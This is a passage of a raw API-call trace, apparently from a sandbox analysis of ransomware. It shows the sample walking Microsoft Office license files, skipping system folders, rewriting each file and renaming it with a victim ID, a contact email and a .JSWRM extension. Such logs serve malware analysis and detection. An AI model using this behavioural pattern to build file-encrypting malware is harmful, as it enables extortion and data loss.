hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0111.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0111.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.585] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0111.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0111.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0111.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0111.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.592] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec180f00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec180f00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec21989a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="VI1410~1.XRM")) returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.592] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0111.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0111.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0111.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0111.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0111.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.593] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11594) returned 1 [0111.593] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0111.594] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0111.599] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.599] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0111.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.599] CloseHandle (hObject=0x45c) returned 1 [0111.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0111.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0111.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0111.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0111.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0111.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0111.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.604] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec15aca4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec15aca4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec1f3616, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="VIF8F4~1.XRM")) returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0111.604] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0111.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0111.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0111.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.606] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19939) returned 1 [0111.606] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0111.606] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0111.613] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.613] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0111.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.614] CloseHandle (hObject=0x45c) returned 1 [0111.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0111.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0111.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0111.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0111.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0111.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0111.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0111.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0111.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.615] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec10e7fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec10e7fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec1a7162, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Retail-pl.xrm-ms", cAlternateFileName="VI15BF~1.XRM")) returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="recovery") returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.615] lstrcmpiW (lpString1="VisioProR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0111.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0111.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0111.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0111.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0111.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0111.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0111.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0111.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2413a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0111.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0111.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0111.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.616] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10639) returned 1 [0111.616] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0111.617] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0111.622] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.622] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0111.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.622] CloseHandle (hObject=0x45c) returned 1 [0111.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0111.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.623] 